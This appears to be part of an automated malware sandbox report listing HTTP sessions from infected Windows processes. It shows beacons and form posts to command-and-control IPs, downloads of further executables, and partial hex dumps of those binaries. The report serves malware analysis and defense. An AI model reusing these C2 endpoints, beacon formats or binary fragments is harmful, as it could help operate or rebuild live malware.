                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 2d 2d 0d 0a
                                                                          Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="message"ybncbhylepme------GHJDHDAECBGCAKEBAEBA--
                                                                          Sep 27, 2024 04:21:32.902636051 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:32 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=80
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:32.920731068 CEST473OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAK
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 272
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a
                                                                          Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKECFIIEHCFHIECAFBAK--
                                                                          Sep 27, 2024 04:21:34.435580969 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:33 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=79
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.549723185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:13.777290106 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000066001&unit=246122658369
                                                                          Sep 27, 2024 04:21:14.490046978 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:14 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.549724176.113.115.95807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:14.087455988 CEST58OUTGET /thebig/stories.exe HTTP/1.1
                                                                          Host: 176.113.115.95
                                                                          Sep 27, 2024 04:21:14.987613916 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.14.1
                                                                          Date: Fri, 27 Sep 2024 02:21:14 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 3247089
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Content-Description: File Transfer
                                                                          Content-Disposition: attachment; filename=stories.exe
                                                                          Content-Transfer-Encoding: binary
                                                                          Expires: 0
                                                                          Cache-Control: must-revalidate
                                                                          Pragma: public
                                                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@P,CODE0 `DATAP@BSS.idataP@.tls.rdata@P.reloc@P.rsrc,,@P@
                                                                          Sep 27, 2024 04:21:14.987627029 CEST1236INData Raw: 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: @Pstring<@m@)@(@(@)@$)@Free0
                                                                          Sep 27, 2024 04:21:14.987782001 CEST1236INData Raw: 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 3c c4 40 00 e8 6c fe ff ff 84 c0 75 13 68 00 80
                                                                          Data Ascii: [SVW}sjh Vj;t#<@luhjP3_^[SVWUCjh hU;usjh VU;t#<@uhjPb3]_^[SVWUL$$D$
                                                                          Sep 27, 2024 04:21:14.987795115 CEST672INData Raw: b8 4c c4 40 00 e8 95 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 ce 19 40 00 64 ff 32 64 89 22 68 1c c4 40 00 e8 39 f9 ff ff 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 2e f9 ff ff b8 3c c4 40 00 e8 8c f9 ff ff b8 4c c4
                                                                          Data Ascii: L@3_^[U3Uh@d2d"h@9=2@th@.<@L@x@xhjt@=t@t/t@3L@=u\@@h@@3ZYYdh@=2@th@)@]US=@3Uh@
                                                                          Sep 27, 2024 04:21:14.987807035 CEST1236INData Raw: 10 83 c0 04 e8 ca ff ff ff c3 83 fa 04 7c 0a 8b ca 81 c9 02 00 00 80 89 08 03 c2 83 20 fe c3 53 56 8b d0 83 ea 04 8b 12 8b ca 81 e1 02 00 00 80 81 f9 02 00 00 80 74 0a c7 05 18 c4 40 00 04 00 00 00 8b da 81 e3 fc ff ff 7f 2b c3 8b c8 33 11 f7 c2
                                                                          Data Ascii: | SVt@+3t@t r+;pt@^[@SVW3t%uhF#_^[SVWUkC7++
                                                                          Sep 27, 2024 04:21:14.987818956 CEST1236INData Raw: ff 89 7c 86 f4 eb 26 8b f3 85 f6 79 03 83 c6 03 c1 fe 02 8b 3d 74 c4 40 00 89 44 b7 f4 8b 32 89 75 f8 8b 75 f8 89 46 04 8b 75 f8 89 30 8b c1 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 fc c3 40 00 83 eb 04 01 1d 00 c4 40 00 e8 8e 0e 00 00 e9
                                                                          Data Ascii: |&y=t@D2uuFu0RE@@;l@J)l@=l@}l@3l@p@p@E@@92E3ZYYdhO!@=2@th@5E_^[YY]@UQSVW3
                                                                          Sep 27, 2024 04:21:14.987832069 CEST1236INData Raw: ff 74 12 8b c8 8b d7 8b c3 e8 2d 01 00 00 8b c3 e8 fe fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 89 25 40 00 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 fb ec ff ff c3 e9 75 08 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8b c0 85 c0 74 0a ff 15 04
                                                                          Data Ascii: t-}3ZYYdh%@=2@th@uE_^[Y]t@tjt@uRt2tP@Yt.@utP@Yt@@tZH=&@y"
                                                                          Sep 27, 2024 04:21:14.987844944 CEST1236INData Raw: 18 8a 1a eb eb b5 00 8a 5c 0e 06 32 1c 0a 80 e3 df 75 ee 49 75 f1 8b 46 02 5f 5e 5b c3 8b c0 53 56 57 89 cf 31 db 31 c9 8b 70 dc 85 f6 74 13 66 8b 0e 83 c6 02 3b 56 02 74 13 66 8b 1e 01 de 49 75 f3 8b 40 ec 85 c0 75 df 88 07 eb 0a 83 c6 06 31 c9
                                                                          Data Ascii: \2uIuF_^[SVW11ptf;VtfIu@u1A_^[SVW11Pptf>N8ttOu@uZN\2uIuZ_^[RQSP1L$diA*@Ad[YZD$,@&R=
                                                                          Sep 27, 2024 04:21:14.987948895 CEST896INData Raw: 83 60 04 fd 81 38 ce fa ed 0e 74 0d 8b 42 08 e8 1f fa ff ff e8 02 fc ff ff 31 c0 83 c4 14 64 8b 10 59 8b 12 89 11 5d 5f 5e 5b b8 01 00 00 00 c3 8d 40 00 e8 2b 02 00 00 8b 90 00 00 00 00 8b 0a 89 88 00 00 00 00 8b 42 08 e8 e5 f9 ff ff 5a 8b 64 24
                                                                          Data Ascii: `8tB1dY]_^[@+BZd$,1YdX]{1L$D$d$@UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&
                                                                          Sep 27, 2024 04:21:14.987962961 CEST1236INData Raw: 10 00 c3 31 c0 c3 90 53 56 57 89 c3 89 d6 89 cf 89 f8 e8 cc ff ff ff 89 f9 89 c7 85 f6 74 09 89 c2 89 f0 e8 eb f3 ff ff 89 d8 e8 f8 fe ff ff 89 3b 5f 5e 5b c3 8b c0 52 89 e2 b9 01 00 00 00 e8 c3 ff ff ff 5a c3 90 31 c9 8a 0a 42 e8 b6 ff ff ff c3
                                                                          Data Ascii: 1SVWt;_^[RZ1B1t!R:t:Jt:Jt:JtBBBZ)@t@t?SVWyV9tNT_^[ta;t\;tPQZXSV
                                                                          Sep 27, 2024 04:21:14.993784904 CEST837INData Raw: 10 e9 c9 ee ff ff c3 31 d2 66 8b 10 f7 c2 00 40 00 00 75 1a 83 fa 08 72 15 81 fa 00 01 00 00 75 13 66 c7 00 00 00 83 c0 08 e9 25 fa ff ff 66 c7 00 00 00 c3 50 e8 b5 da ff ff c3 39 d0 74 6c 66 83 38 08 72 1b 50 52 66 81 38 00 01 74 08 50 e8 9b da
                                                                          Data Ascii: 1f@uruf%fP9tlf8rPRf8tPZXf:sJHJHf:uRtJA~JfPfRPTT@USVWf;u;fEWjhVEP"tE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.549725185.215.113.117805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:14.544011116 CEST58OUTGET /inc/needmoney.exe HTTP/1.1
                                                                          Host: 185.215.113.117
                                                                          Sep 27, 2024 04:21:15.269310951 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:15 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 4278784
                                                                          Last-Modified: Thu, 12 Sep 2024 13:56:06 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66e2f2f6-414a00"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 [TRUNCATED]
                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*8L@A@x" 7`@PCODE `DATA -.@BSS.idatax"$@.tls@.rdataP@P.reloc@`@P.rsrc7 7@PAJA@P
                                                                          Sep 27, 2024 04:21:15.269341946 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40
                                                                          Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word@Cardinal@Int64
                                                                          Sep 27, 2024 04:21:15.269356012 CEST1236INData Raw: 50 08 8b 56 04 89 50 0c 8b 13 89 10 89 58 04 89 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 e8 05 49 00 89 10 a3 e8 05 49 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 06 8b
                                                                          Data Ascii: PVPXB^[PQIISVWUQ$]$PV;SS;uCCFF;CuCF;uVu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u)
                                                                          Sep 27, 2024 04:21:15.269457102 CEST1236INData Raw: 83 7c 24 0c 00 75 b1 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 25 fd ff ff 8b 04 24 33 d2 89 10 e9 90 00 00 00 8d 4c 24 04 8b d7 8b c6 e8 94 fc ff ff 83 7c 24 04 00 74 34 8d 4c 24 0c 8d 54 24 04 8b c5 e8 16 fb ff ff 83 7c 24 0c 00 0f 85 66 ff ff ff
                                                                          Data Ascii: |$uL$T$D$%$3L$|$t4L$T$|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$
                                                                          Sep 27, 2024 04:21:15.269468069 CEST1236INData Raw: 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb 11 8d 4c 24 01 8b d7 83 ea 04 8d 46 04 e8 b2 fb ff ff 8b 6c 24 01 85 ed 74 34 8b d5 2b d6 8b c6 e8 63 fe ff ff 8b c5 03 44 24 05 8b 53
                                                                          Data Ascii: ++}L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$IDu$I\[:CZ,<|uI
                                                                          Sep 27, 2024 04:21:15.269479990 CEST1236INData Raw: 05 49 00 e8 fd f0 ff ff c3 e9 ef 16 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b d8 33 c0 a3 c8 05 49 00 80 3d c4 05 49 00 00 75 1f e8 66 f7 ff ff 84 c0 75 16 c7 05 c8 05 49 00 08 00 00 00 c7 45 fc 08 00 00 00 e9 61
                                                                          Data Ascii: IE_^[YY]@UQSVW3I=IufuIEa3Uh$@d1d!=MIthIuII%)ItEP|tI+;PtIT
                                                                          Sep 27, 2024 04:21:15.269490957 CEST776INData Raw: e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c d0 48 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 43 3b 00 00 83 b8 00 00 00 00 00 74 0f e8 35 3b 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 23 3b 00 00 83 b8 00 00 00 00 00 74 0f e8 15 3b 00 00 8b 80
                                                                          Data Ascii: tP<HYt@C;t5;@3#;t;@3SV;t:^:3F3^[@HqSV=ItIu:w3HH3^[$
                                                                          Sep 27, 2024 04:21:15.269507885 CEST1236INData Raw: d7 f3 a4 5f 5e c3 88 c8 2a 0f 76 f7 88 ca eb e8 c3 33 c9 8a 0a 41 92 e8 65 fe ff ff c3 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 4b fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1
                                                                          Data Ascii: _^*v3AeS:vB@K[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6
                                                                          Sep 27, 2024 04:21:15.269551039 CEST1236INData Raw: 8f a1 5f 40 df 4e 67 04 cd c9 f2 c9 62 40 96 22 81 45 40 7c 6f fc 65 40 9e b5 70 2b a8 ad c5 9d 69 40 d5 a6 cf ff 49 1f 78 c2 d3 40 a3 14 9b c5 16 ab b3 ef 3d 41 e0 8c e9 80 c9 47 ba 93 a8 41 aa 17 e6 7f 2b a1 16 b6 12 42 6b 55 27 39 8d f7 70 e0
                                                                          Data Ascii: _@Ngb@"E@|oe@p+i@Ix@=AGA+BkU'9p|B0<RB~QC/j\&Cv)/&D'DDYdEJzEb>9FFuuvHM9;5S]=];Z T7aZ%]g']
                                                                          Sep 27, 2024 04:21:15.269562006 CEST1236INData Raw: ff ff 59 58 74 02 ff e6 59 e9 63 f5 ff ff c3 8b c0 eb 02 8b 00 39 d0 74 08 8b 40 dc 85 c0 75 f3 c3 b0 01 c3 90 83 c0 c4 8b 00 c3 8b c0 b8 ff ff 00 80 c3 8b c0 c3 8d 40 00 c3 8d 40 00 c3 8d 40 00 56 66 8b 32 66 09 f6 74 17 66 81 fe 00 c0 73 10 50
                                                                          Data Ascii: YXtYc9t@u@@@Vf2ftfsPpXt^^aSVW11ptf>N8tfOu@u\12uIuF_^[SVW11ptf;VtfIu@u1A
                                                                          Sep 27, 2024 04:21:15.274327993 CEST1236INData Raw: 8b 44 24 14 8b 48 0c eb 27 80 3d 2c d0 48 00 01 76 1e 80 3d 28 d0 48 00 00 77 15 50 8d 44 24 08 52 51 50 e8 31 d9 ff ff 83 f8 00 59 5a 58 74 6d 31 db 64 8b 1b 53 50 52 51 8b 54 24 28 83 48 04 02 56 6a 00 50 68 c0 39 40 00 52 ff 15 18 00 49 00 5b
                                                                          Data Ascii: D$H'=,Hv=(HwPD$RQP1YZXtm1dSPRQT$(HVjPh9@RI[|$()oG9@D$c#Z)AD$T$@tJBD:@SVWUj]_^[uZTUWVSPR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.549726185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:18.382704020 CEST183OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 65 31 3d 31 30 30 30 30 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: e1=1000065001&unit=246122658369
                                                                          Sep 27, 2024 04:21:19.108994007 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:18 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.549727185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:19.259577990 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:19.961982012 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:19 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:20.068553925 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:20.299313068 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:20 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.549728185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:20.150887966 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000191001&unit=246122658369
                                                                          Sep 27, 2024 04:21:20.850487947 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:20 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0
                                                                          Sep 27, 2024 04:21:20.892436981 CEST53OUTGET /inc/penis.exe HTTP/1.1
                                                                          Host: 185.215.113.16
                                                                          Sep 27, 2024 04:21:21.116508007 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:21 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 419328
                                                                          Last-Modified: Thu, 26 Sep 2024 16:40:28 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f58e7c-66600"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b d9 e1 fd 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 4a 06 00 00 1a 00 00 00 00 00 00 ae 68 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 68 06 00 4b 00 00 00 00 80 06 00 f4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
